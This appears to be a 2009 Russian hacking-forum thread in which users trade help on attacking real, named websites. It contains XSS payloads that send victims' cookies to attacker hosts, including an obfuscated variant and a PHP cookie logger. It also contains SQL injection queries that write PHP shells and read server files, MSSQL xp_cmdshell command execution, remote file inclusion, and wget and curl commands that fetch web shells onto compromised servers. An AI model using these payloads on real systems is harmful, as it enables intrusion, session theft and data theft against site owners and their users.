cctvline_cctv@212.193.224.223 - user ?? (хотя тут не очень понимаю как так)Просто MySQL-сервер установлен не на локалхосте, а на удаленной машине. MySQL-сервер имеет адрес 212.193.224.223и имя пользователя, используемого при коннектеcctvline_cctvа есть ман какой-то? как вообше подбираеться столбцы(таблицы)..?Так как 4 версия мускула, то таблиц INFORMATION_SCHEMA нет, следовательно таблицы и колонки узнать можно только брутом(ручным или же разными скриптами, которые выкладывали в кодинге. Вроде SIPT тоже умеет)
p.r0phe.t
21.11.2009, 08:56
Это дело будет работать если на сервере в конфиге апача для метода PUT прописан специальный cgi скрипт, который создает файлы
Ну нету там веб-сервера! Смотри пор и демон,который висит на нём!
Во многих статьях идет описания ворования куков с помощью xss.
Я как бы нашел все но вот уже часа 2 не догоняю что делает картинка 1x1px и куда сохрянятся куки? во многих статьях написанно про картинку
<script>
img = new Image();
img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
</script>
а что она делает? куда куки сохранятся?
DrAssault
21.11.2009, 10:24
Ну нету там веб-сервера! Смотри пор и демон,который висит на нём!
Скорее всего тут прав Scipio и речь идет не про метод PUT, а про эфтипишную комманду ;)
можно ли в joomla 1.0.15 залить шелл при условии, что компоненты ставить нельзя, php= safe mode? установленных бажных компонентов на первый взгляд нет, вход в админку имеется :(
ElteRUS
ого )) спасибо. получил точно такое:
'4.1.22/cctvline_dbb/cctvline_cctv@212.193.224.223''
Не хочу выгядеть тупым, но не знаю я парвильно думаю?
4.1.22 - version
cctvline_dbb - database
cctvline_cctv@212.193.224.223 - user ?? (хотя тут не очень понимаю как так)
а что косается таблиц и столбцов - откуда унали, что сушествует таблица admin?
получается, что blind SQL ?
а есть ман какой-то? как вообше подбираеться столбцы(таблицы)..?
Если file_priv = Y.
Найди полный путь.
Потому
То http://www.ru/vn84.php?id=-1+union+select+null,null,null,null,null,null,null, null,null,null,null,null,0x3C3F206576616C28245F524 551554553545B635D293B203F3E,null,null+INTO+OUTFILE +'/полный/путь/inaex.php'--+
Далее если всё норм.
Нужно allow_url_fopen = on.
?с=copy($_GET[a], $_GET[b]);&a=http://site/shell.txt&b=inbex.php
(Да да inbex.php)
Я знаю вы поможете мне вы умные все )
Я нашел xss и пытаюсь сделать ссылку для того что бы послать ее жертве
вот примерно такая
?username='><script>img = new Image();img.src="http://site.ru/kartinka.gif?"+document.cookie;</script> <
На моем сайте уже залита картинка 1x1px и находится по адресу http://site.ru/kartinka.gif
Пробую сам переходить по этой ссылки скрипт вроде работает а вот я не знаю куда cookies сохранились или должна быть специальная картинка 1x1px у меня она прозрачная gif.
Помогите реализовать мои коварные планы :(
mailbrush
21.11.2009, 11:10
Я знаю вы поможете мне вы умные все )
Я нашел xss и пытаюсь сделать ссылку для того что бы послать ее жертве
вот примерно такая
?username='><script>img = new Image();img.src="http://site.ru/kartinka.gif?"+document.cookie;</script> <
На моем сайте уже залита картинка 1x1px и находится по адресу http://site.ru/kartinka.gif
Пробую сам переходить по этой ссылки скрипт вроде работает а вот я не знаю куда cookies сохранились или должна быть специальная картинка 1x1px у меня она прозрачная gif.
Помогите реализовать мои коварные планы :(
Это должна быть не просто картинка, а PHP-скрипт, который записывает переданные ему данные куда - либо.
Я знаю вы поможете мне вы умные все )
Я нашел xss и пытаюсь сделать ссылку для того что бы послать ее жертве
вот примерно такая
?username='><script>img = new Image();img.src="http://site.ru/kartinka.gif?"+document.cookie;</script> <
На моем сайте уже залита картинка 1x1px и находится по адресу http://site.ru/kartinka.gif
Пробую сам переходить по этой ссылки скрипт вроде работает а вот я не знаю куда cookies сохранились или должна быть специальная картинка 1x1px у меня она прозрачная gif.
Помогите реализовать мои коварные планы :(
Вообще если XSS Пассивная, то лучше юзать <script src=http://evil/evilscript.js>cookie()</script>
function cookie(){
window.location="cookie.php?data="+document.cookie;
}
в cookie.php
<?PHP
$file=fopen('cookie.txt', 'A+');
fwrite($file, $_GET['data']);
fclose($file);
?>
ps
Файл cookie.txt должны быть разрешены для записи.
p.r0phe.t
21.11.2009, 11:13
Скорее всего тут прав Scipio и речь идет не про метод PUT, а про эфтипишную комманду ;)
Ну да,скорее всего так и есть.
Но как подключиться к фтп на udp порту и какой синтаксис это команды?
NetCat ничего не выводит,хотя соединение не обрывает.
Я знаю вы поможете мне вы умные все )
Я нашел xss и пытаюсь сделать ссылку для того что бы послать ее жертве
вот примерно такая
?username='><script>img = new Image();img.src="http://site.ru/kartinka.gif?"+document.cookie;</script> <
На моем сайте уже залита картинка 1x1px и находится по адресу http://site.ru/kartinka.gif
Пробую сам переходить по этой ссылки скрипт вроде работает а вот я не знаю куда cookies сохранились или должна быть специальная картинка 1x1px у меня она прозрачная gif.
Помогите реализовать мои коварные планы :(
Я думаю тебе надо регатся на тут (http://web-defence.ru/snif/),нажимаеш завести ID регаешся и
изменят на твоем запросе эту часть так:
<script>img=new Image(); img.src="http://web-defence.ru/snif/s.gif?id=ТВОЙ ИД НОМЕР&"+document.cookie;</script>
потом куки найдеш тута (http://web-defence.ru/snif/) наберив твой ид и пасс
Вообще если XSS Пассивная, то лучше юзать <script src=http://evil/evilscript.js>cookie()</script>
function cookie(){
window.location="cookie.php?data="+document.cookie;
}
в cookie.php
<?PHP
$file=fopen('cookie.txt', 'A+');
fwrite($file, $_GET['data']);
fclose($file);
?>
ps
Файл cookie.txt должны быть разрешены для записи.
Сделал как ты сказал провери файл cookie.txt он пустой :(
посмотрел исходный код нашел место куда записался скрипт вот что там
<input type='text' maxlength='100' size='14' class='text' id='username' name='username' value='\'><script src=http://site.ru/js.js>cookie()</script> <'> <br><br>
Я думаю тебе надо регатся на тут (http://web-defence.ru/snif/),нажимаеш завести ID регаешся и
изменят на твоем запросе эту часть так:
потом куки найдеш тута (http://web-defence.ru/snif/) наберив твой ид и пасс
Сделал как ты сказал но поставился фильтр
<script>img=new Image(); img.src=\"http://web-defence.ru/snif/s.gif?id=850'>
тут если " идет то он перед ней ставит \
Есть у кого еще какие нибудь предложения по самой простой теме :(
Я знаю вы поможете мне вы умные все ) Я нашел xss и пытаюсь сделать ссылку для того что бы послать ее жертве вот примерно такая ?username='><script>img = new Image();img.src="http://site.ru/kartinka.gif?"+document.cookie;</script> < На моем сайте уже залита картинка 1x1px и находится по адресу http://site.ru/kartinka.gif Пробую сам переходить по этой ссылки скрипт вроде работает а вот я не знаю куда cookies сохранились или должна быть специальная картинка 1x1px у меня она прозрачная gif. Помогите реализовать мои коварные планы :(
Добавление: Если в запросе писать " то перед " он ставит знак \ из за этого способ YuNi|[c не работает так как там код c "
<script>img=new Image(); img.src="http://web-defence.ru/snif/s.gif?id=850'><
Пробовал без " все равно лог не пришел не какой.
Способ от Ctacok'a сделал все как он сказал но в cookie.txt не что не сохранилось права стоят 777
Добавление:
Пробовал кодировать что бы обойти фильтр но лог так и не пришел :(
без " твой запрос не будеть правильным, но если кавычки фильтруется тогда незнаю, у меня норм работает через веб дефенс
цитирую есть ли у кого нибудь эксплойт на Microsoft .NET Framework Version:2.0.50727 Никак не могу найти
l1ght
выполнил это(http://www.site.ru/vn84.php?id=-1+union+select+*+from+(select+*+from+admin+join+ad min+a+join+admin+b)c--+1). как не удивительно, но открылся страница по продукциям и докумнетаниями этого конторы. можно считать, что ваш запрос ничего не выдал, если не считать, что не понятные цифры появились на странице (со странным названием страницы: opinions, хотя там документации и дистрибутив находится):
http://s51.radikal.ru/i134/0911/35/d4d824e84512.jpg
gisTy
Спасибо за разяснение. А эта информация в данным ситуации нужен? Или это как определись платформу удаленного жертвы?
Ctacok
Не очень понал...
Найди полный путь.
можно тут подробнее ? Не понимаю о каком пути идет речь.. (может там надо написать путь своего веб шелла?)
Есть возможность загрузить php файл вместо изображения, только неизвестен путь на сервере, куда будет загружен этот файл. Есть возможность как то обратиться к этому файлу, что бы он выдал своё местонахождение или существуют другие способы?
можеть кто раскрутит инъекцию, никак сам не могу. Вроде блинд, но правильный запрос не могу составить
http://drstockpick.com/?cat=1'
нашел через order by количество полей(9) принтебл поля нету. Как правильно составить запрос на блинд иъекцию в такой ситуации
DrAssault
21.11.2009, 14:25
Ctacok
Не очень понал...
можно тут подробнее ? Не понимаю о каком пути идет речь.. (может там надо написать путь своего веб шелла?)
Речь идёт о полном пути доступном на запись твоего мини вэб шелла...
YuNi|[c там robots.txt не закрыт :) мило
http://drstockpick.com/robots.txt
сайт на вордпресе какая blind іньекция :). ищи баг в вордпресе!!!!!
спс но там версия WordPress 2.7.2-alpha и багов не нашел пока.
Видимо надо залить шелл через соседные сайты. Хотелось бы посмотреть видео какой нит типа лом сервака заливкой шелла через соседный сайт
Есть возможность загрузить php файл вместо изображения, только неизвестен путь на сервере, куда будет загружен этот файл. Есть возможность как то обратиться к этому файлу, что бы он выдал своё местонахождение или существуют другие способы?
Это изображение можно же как то просмотреть?
Есть возможность загрузить php файл вместо изображения, только неизвестен путь на сервере, куда будет загружен этот файл. Есть возможность как то обратиться к этому файлу, что бы он выдал своё местонахождение или существуют другие способы?
Если форма прежназначена для загрузки картинок, то посмотри свойства одного из изображений, в новостях например, там будет указана папка с изображениями. Наверняка и твой файл там.
Microsoft SQL Native Client error '80040e14'
Incorrect syntax near '='.
/boards/rss_add.asp, line 9
Это вед ошибка MSSQL?
Strilo4ka Спасибо, руками уже пробывал - безрезультатно, буду колдовать со сканером))
Ctacok Незнаю, изображение добавляется как скриншот в письме в саппорт о неполадке сервиса :D
SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)d) as t JOIN (SELECT NAME_CONST((SELECT passhash FROM users LIMIT 1), 14)e) b)a
Возможно ли через этот метод читать и записывать файлы?
DrAssault
21.11.2009, 18:58
YuNi|[c там robots.txt не закрыт :) мило
http://drstockpick.com/robots.txt
А почему он должен быть закрыт, не подскажешь? :(
Чем можно сдампить большую БД (12кк записей)
sypex не смог
На сервере можно запускать cgi скрипты.
Попробовал
#!/bin/sh
DB=forum
USER=root
PASS=motynub
HOST=localhost
echo "Content-Type: text/plain"
echo "Content-Disposition: attachment; filename=$DB.sql"
echo
mysqldump --opt --quick --max_allowed_packet=1M --default-character-set=utf8 -u "$USER" -p"$PASS" -h $HOST $DB
Но вышел еррор 500 (safe_mode = ON)
2 InFlame
чтение файлов возможно, используй load_file(). Естественно для успешного чтения юзер под которым работает бд должен иметь file_priv = Y
SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST(load_file('C:/boot.ini'),1)d) as t JOIN (SELECT NAME_CONST(load_file('C:/boot.ini'),1)e)b)a
вывод режется до 64 символов
остальные символы читаем с помощью функции substr()
SELECT 1 FROM news WHERE id=-1 UNION SELECT * FROM (SELECT * FROM (SELECT NAME_CONST(substr(load_file('C:/boot.ini'),63),1)d) as t JOIN (SELECT NAME_CONST(substr(load_file('C:/boot.ini'),63),1)e)b)a
на http://investorshub.advfn.com/boards/boards_moderated.asp?user='
Microsoft SQL Native Client error '80040e14'
Unclosed quotation mark after the character string ''.
/boards/boards_moderated.asp, line 19
а на http://investorshub.advfn.com/boards/boards_moderated.asp?user='+and+1=convert(int,@@ve rsion)--
идеть редирект на главную страницу. Как поступит в данном случае или просто забыть про ресурс?
Можно ли с этим как-либо шелл залить или тут просто фрейм и вообще лучше забить?
Вот ссылка: http://www.pngbd.com/business/?page=http://forum.antichat.ru
есть ли возможность брутить сами имена таблицы посимвольно на 4 вертке MySQL? А то тока на 5 версии есть такое возможность
BlackPanther
22.11.2009, 14:16
Можно ли с этим как-либо шелл залить или тут просто фрейм и вообще лучше забить?
Вот ссылка: http://www.pngbd.com/business/?page=http://forum.antichat.ru
можно
залей на какой нить свой сайт шелл и подаставь его
типо http://www.pngbd.com/business/?page=http://site/shell.txt
YuNi|[c
по моему нет, можно через различные программы для sql иньекций гонять на различные базы таблиц :(
можно
залей на какой нить свой сайт шелл и подаставь его
типо http://www.pngbd.com/business/?page=http://site/shell.txt
YuNi|[c
по моему нет, можно через различные программы для sql иньекций гонять на различные базы таблиц :(
Это фрейм =\
Чем можно сдампить большую БД (12кк записей)
sypex не смог
На сервере можно запускать cgi скрипты.
Попробовал
#!/bin/sh
DB=forum
USER=root
PASS=motynub
HOST=localhost
echo "Content-Type: text/plain"
echo "Content-Disposition: attachment; filename=$DB.sql"
echo
mysqldump --opt --quick --max_allowed_packet=1M --default-character-set=utf8 -u "$USER" -p"$PASS" -h $HOST $DB
Но вышел еррор 500 (safe_mode = ON)
Попробуй запустить процесс в фоновом режиме, чтобы php не дожидался его завершения.
Вообще Sypex 2.0 может перезапускать себя для работы при safe_mode=on, проверь может ты старый использовал
DrakonSerg
22.11.2009, 16:00
пробуем зайти на сайт (точнее на админку) - показывает пустую страницу (и исходный код тоже пуст). Что это за фигня? Можно как нибудь обойти?
Тьфу, не так понял, зачем брутить посимвольно, если можно целиком :) Есс-но посимвольно не получиться, там же нет information_schema, чо за вопросы вообще, аж в ступор вводят
Хех Pashkela я знаю что там нету inf_sch, вед если не знаеш префикс таблицы, то бесполезно твои гадания нас чет префиксов. Если бы было возможность брутить хотябы таблицы(не колонки) посимвольно тогда было бы супер.
ЗЫ. В ступорь не вводись ты еще нужень для поддержки мега тулзы
Имею код вида
<?php
...
$some = $_POST[some];
$s = mssql_query($some);
и тут уже вывод того, что получилось.
?>
Дело в том, что кавычки экранируются. Как использовать тогда
exec master..xp_cmdshell ???
часто работает exec master..xp_cmdshell [cmd]
Большое спасибо, вроде, работает, по крайней мере машина ушла в ребут после [shutdown /f /r], но что-то не выдает результат работы запроса(допустим [dir]).
для этого тебе нужно создать таблицу в которую будешь писать вывод с помощью insert into ... execute xp_cmdshell "dir" или просто перенаправлять вывод в файл
для этого тебе нужно создать таблицу в которую будешь писать вывод с помощью insert into ... execute xp_cmdshell "dir" или просто перенаправлять вывод в файл
Пример можно(если можно) ? Конкретно ваш(с созданием таблицы и выводом).У меня на своей не выходит.
1 create table xxx (yyy varchar(300));insert into xxx exec master..xp_cmdshell 'dir';
2 ... 'dir >> file.txt';
таблицу лучше создавать с полем id, чтобы было удобнее выводить результат:
CREATE TABLE temp (id int IDENTITY, text nvarchar(8000));
INSERT INTO temp exec master..xp_cmdshell dir;
SELECT text FROM temp WHERE id = 1
Что за ошибка такая ?
type Exception report
message
description The server encountered an internal error () that prevented it from fulfilling this request.
exception
java.lang.NumberFormatException: For input string: "58'"
java.lang.NumberFormatException.forInputString(Num berFormatException.java:48)
java.lang.Integer.parseInt(Integer.java:456)
java.lang.Integer.parseInt(Integer.java:497)
javax.servlet.http.HttpServlet.service(HttpServlet .java:627)
javax.servlet.http.HttpServlet.service(HttpServlet .java:729)
com.evalica.util.http.upload.MultipartRequestFilte r.doFilter(MultipartRequestFilter.java:28)
com.evalica.cm.core.session.SessionCookieFilter.do Filter(SessionCookieFilter.java:47)
note The full stack trace of the root cause is available in the Apache Tomcat/5.5.27 logs.
Ошибка базы или сервера ?
geezer.code
23.11.2009, 17:37
Ошибка ява-приложения.
java.lang.NumberFormatException: For input string: "58'"
Фактически сервер говорит, что переданная мне строка - не число.
честно сказать такое в первые вижу:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[MySQL][ODBC 3.51 Driver][mysqld-4.0.20a-nt]You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'union select 1,2,3,4,5, '2009-11-23 15:04')' at line 1
/inc/product_details/get_cats.inc, line 5
тут MSSQL или MYSQL ?
Pashkela
23.11.2009, 19:08
если есть надпись Microsoft - то явно не просто Mysql, как сам считаешь?
aka PSIH
23.11.2009, 19:10
если есть надпись Microsoft - то явно не просто Mysql, как сам считаешь?
а если есть надпись mysqld-4.0.20a-nt ?
Ded MustD!e
23.11.2009, 19:10
честно сказать такое в первые вижу:
тут MSSQL или MYSQL ?
MySQL
если есть надпись Microsoft - то явно не просто Mysql, как сам считаешь?
http://ru.wikipedia.org/wiki/ODBC - от туда и надпись Microsoft
А БД там MySQL.
Ты так и не научился что либо читать, а по прежнему уверено отвечаешь на вопросы, которые сам не понимаешь.
Ситуация в том что я нашел xss но при попытке засунуть ей вот этот скрипт
<SCRIPT type="text/javascript" src="http://your_site.com/js.js"></SCRIPT>
Нечего не происходит так как у него фильтр на " и %22 его аналог фильтр заключается в том что перед ним он ставит знак \ а именно
<SCRIPT type=\"text/javascript\" src=\"http://your_site.com/js.js\"></SCRIPT>
Его можно как нибудь обойти или это все?
просто когда пишешь
<script>alert(document.cookie)</script>
Все показывает.
[Forest]
23.11.2009, 23:02
ставь одинарные кавычки
Опять ставит фильтр
<SCRIPT type=\'text/javascript\' src=\'http://my_site.com/js.js\'></SCRIPT>
[Forest]
23.11.2009, 23:20
Опять ставит фильтр
<SCRIPT type=text/javascript src=http://alert.h16.ru/cb/js.js></SCRIPT>
не уверен быдет ли пахать...
add:
http://sec-123.narod.ru/xss/HTML.txt
2xofffff
Попробуй так:
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+"\\"+$.$$$+$.$_$+"\\"+$.__$+$.$_$+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$.$$$+" \\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.$_$+$.$_$_+"\\"+$.__$+$.$__+$.$$$+$.$$$_+"()\\"+$.$$$+$._$$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+".\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.$$$+$.$_$+"\\\"\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"\\"+$.$$$+$._$_+"//"+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+".\\"+$.__$+$.$_$+$.___+$.__$+$.$$_+".\\"+$.__$+$.$$_+$._$_+$._+"/"+$.$$__+$.$_$$+"/\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"\\\"\\"+$.$$$+$._$$+"\"")())();</script>
Это закодированое
<script>img=new Image();img.src="http://alert.h16.ru/cb/js.js";</script>
UPD:
Хотя, если двойные кавычки под фильтром, то не выйдет, только что обратил внимание.
<SCRIPT type=text/javascript src=http://alert.h16.ru/cb/js.js></SCRIPT>
Это к стати работает!
Зато меня искренне радует ваше внимание. Кстати, YuNi|[c - чей смит? :)
не понял что ты имел ввиду под красным!!!
2xofffff
Попробуй так:
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+"\\"+$.$$$+$.$_$+"\\"+$.__$+$.$_$+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$.$$$+" \\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.$_$+$.$_$_+"\\"+$.__$+$.$__+$.$$$+$.$$$_+"()\\"+$.$$$+$._$$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+".\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.$$$+$.$_$+"\\\"\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"\\"+$.$$$+$._$_+"//"+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+".\\"+$.__$+$.$_$+$.___+$.__$+$.$$_+".\\"+$.__$+$.$$_+$._$_+$._+"/"+$.$$__+$.$_$$+"/\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"\\\"\\"+$.$$$+$._$$+"\"")())();</script>
Это закодированое
<script>img=new Image();img.src="http://alert.h16.ru/cb/js.js";</script>
UPD:
Хотя, если двойные кавычки под фильтром, то не выйдет, только что обратил внимание.
Это к стати работает!
Это чем же закодировано? Можно ли потом чтоб обйти двойные кавычки закодироват еще чем нибудь (hex, base64)?
2YuNi|[c, если ты закодируешь это потом в бейс64 или хэкс - то вообще ничего пахать не будет.
Инфа по сабжу:
http://raz0r.name/news/xss-filters-bypass-on-blackhat/
http://oxod.ru/2009/08/26/%D0%BE%D0%B1%D1%85%D0%BE%D0%B4-xss-%D1%84%D0%B8%D0%BB%D1%8C%D1%82%D1%80%D0%BE%D0%B2-%D0%BF%D0%BE-%D1%81%D1%80%D0%B5%D0%B4%D1%81%D1%82%D0%B2%D0%B0%D 0%BC-%D0%BE%D1%81%D0%BE%D0%B1%D0%B5%D0%BD%D0%BE%D1%81/
http://utf-8.jp/public/jjencode.html
2xofffff
Попробуй так:
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+"\\"+$.$$$+$.$_$+"\\"+$.__$+$.$_$+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$.$$$+" \\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.$_$+$.$_$_+"\\"+$.__$+$.$__+$.$$$+$.$$$_+"()\\"+$.$$$+$._$$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+".\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.$$$+$.$_$+"\\\"\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"\\"+$.$$$+$._$_+"//"+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+".\\"+$.__$+$.$_$+$.___+$.__$+$.$$_+".\\"+$.__$+$.$$_+$._$_+$._+"/"+$.$$__+$.$_$$+"/\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"\\\"\\"+$.$$$+$._$$+"\"")())();</script>
Это закодированое
<script>img=new Image();img.src="http://alert.h16.ru/cb/js.js";</script>
UPD:
Хотя, если двойные кавычки под фильтром, то не выйдет, только что обратил внимание.
Это к стати работает!
No input file specified.
Написало когда ввел
?username='><SCRIPT type=text/javascript src=http://alert.h16.ru/cb/js.js></SCRIPT></script>
и куки написались в строке браузера но в base.php не сохранились :(
В js.js у меня
location.href =www.site.h16.ru/cb/log.php? + document.cookie;
Кстати еще в строке браузера после того как я написал скрипт перешел на страничку слова No input file specified.
http://hacksite.com/log.php?и тут cookie
superboys
24.11.2009, 06:46
http://bill.svtc.ru/initlogin.php?CardNumber=1&CardCode='
Помогите, незнаю как обойти количество символов :confused:
Заранее спасибо
ILYAtirtir
24.11.2009, 07:26
В сурсе страницы рядом с name=CardCode изменяешь maxlength=12 на maxlength=999999. Только тольку с этого...
superboys
24.11.2009, 08:20
ну вот именно, как бы сделать скюль...
Такой вопрос...
Почему при загрузке файла с бек слешом ("\" без ковычек), отделяется все что было до бек слеша
К примеру
Грузим файл под названием: file.php\jpg
А PHP берет и загружает под именем: jpg
Такой вопрос...
Почему при загрузке файла с бек слешом ("\" без ковычек), отделяется все что было до бек слеша
К примеру
Грузим файл под названием: file.php\jpg
А PHP берет и загружает под именем: jpg Потому что file.php воспринимается как имя директории и отсекается.
Народ,разъясните такую фишку:
if(strstr($username, '**')) {
$admin = 1;
$username = str_replace('**', '', $username);
$_SESSION['admin'] = 1;
} else {
$admin = 0;
}
Я так понял,если в поле username(входа в админку,например) содержится **,то я получаю админскую сессию,становясь,таким образом,админом?))И стать им может любой,кто введёт эти две звёздочки в любом месте поля username...
Только я не понял смысла это выкладывать - ведь не узнаешь,пока исходник скрипта не прочитаешь(а я так понял,это самоделка какая-то,а не кусок кода популярного двига).
Взял с _http://oxod.ru/2009/11/23/лучшие-из-лучших/#more-380
При локальном инклуде читаю конфиг сайта.Хочу поробовать подключиться к БД.Как это сделать удаленно?Допусим есть данные-username,password,db_name.Поле хост-localhost(все это в конфиге).
Пробую через EngInSite MySQL Client.-Неполучается,говорит мол хост неотвечает,в поле хост указывал IP сайта...
При локальном инклуде читаю конфиг сайта.Хочу поробовать подключиться к БД.Как это сделать удаленно?Допусим есть данные-username,password,db_name.Поле хост-localhost(все это в конфиге).
Пробую через EngInSite MySQL Client.-Неполучается,говорит мол хост неотвечает,в поле хост указывал IP сайта...
С такими способами один шанс на несколько тысяч миллиардов.
для удаленного коннекта должен быть разрешен коннект именно для твоего айпи.
ищи phpMyAdmin.
Бруть диры.
Могу посоветовать сканер http://security-digger.org/
HAXTA4OK
24.11.2009, 15:15
При локальном инклуде читаю конфиг сайта.Хочу поробовать подключиться к БД.Как это сделать удаленно?Допусим есть данные-username,password,db_name.Поле хост-localhost(все это в конфиге).
Пробую через EngInSite MySQL Client.-Неполучается,говорит мол хост неотвечает,в поле хост указывал IP сайта...
говорит мол хост неотвечает
Естественно , там localhost, то есть тока фактически с этого компа (серва) ты можеш приконнектиться к БД, а удаленно ни как
При локальном инклуде читаю конфиг сайтапопробуй найти форум/аплоад картинок/etc/
что ба залить фотку с пхп кодом, и инклудь ее уж тогда, что бы потом получить шелл,а вот с шелла и заходи в БД , если будет такая необходимость
Почему не работает команда lynx ? Вроде делаю всё прально:
lynx -source "www.obsd.si/faq/pf/index.html" > /var/www/users/xxx/htdocs/papka/i.html
На папке полные права.Пробовал по всякому,альтернативных команд нету,насколько я знаю,а wget отключён.Touch работает.Мб есть способ как-то создать фаил и передать в него сразу код шелла?)Правда,140+ кб...
Почему не работает команда lynx ? Вроде делаю всё прально:
lynx -source "www.obsd.si/faq/pf/index.html" > /var/www/users/xxx/htdocs/papka/i.html
На папке полные права.Пробовал по всякому,альтернативных команд нету,насколько я знаю,а wget отключён
Посмотри есть ли сама качалка
which wget; which curl; which lynx; which links; which fetch
потом уже качай
wget http://site.com/shell.txt -O /home/user/shell.php
links -source http://site.com/shell.txt > /home/user/shell.php
lynx -source http://site.com/shell.txt > /home/user/shell.php
fetch -o http://site.com/shell.txt -p /home/user/shell.php
curl http://site.com/shell.txt -o /home/user/shell.php
UPDATE:
не проверил, но мне кажется синтаксис мягко говоря не верный.
"www.obsd.si/faq/pf/index.html" ...
(Чисто субъективное мнение, ни тебе протокола, ни здавствуйте, ни досвиданья! =))
Мб есть способ как-то создать фаил и передать в него сразу код шелла?)Правда,140+ кб...
Ага, типа
echo "<?phpinfo();?>" > /tmp/test.php
в место phpinfo, думаю стоит указать что-то типа:
copy($_FILES['filename']['tmp_name'], '/куда/надо/записать.php'); и через этот скрипт средствами php уже грузить любые файлы.
mailbrush
24.11.2009, 17:01
Посмотри есть ли сама качалка
which wget; which curl; which lynx; which links; which fetch
which which wget curl lynx links fetch
which which wget curl lynx links fetch
да, спасибо, мне стало лучше, особенно
which which ...
mailbrush
24.11.2009, 17:05
да, спасибо, мне стало лучше, особенно
which which ...
Это чтобы проверить есть ли which, если ты не понял =\
Это чтобы проверить есть ли which, если ты не понял =\
А which тебе что покажет, если его нет? :D
т.е. результат which which и which curl будет разный, если самого which нету? =\
З.Ы. Модеры, сорри
Хм..попробовал:
echo "copy($_FILES['filename']['tmp_name'], '/var/www/htdocs/write/9.php')" > /var/www/htdocs/write/9.php
Чет не канает...
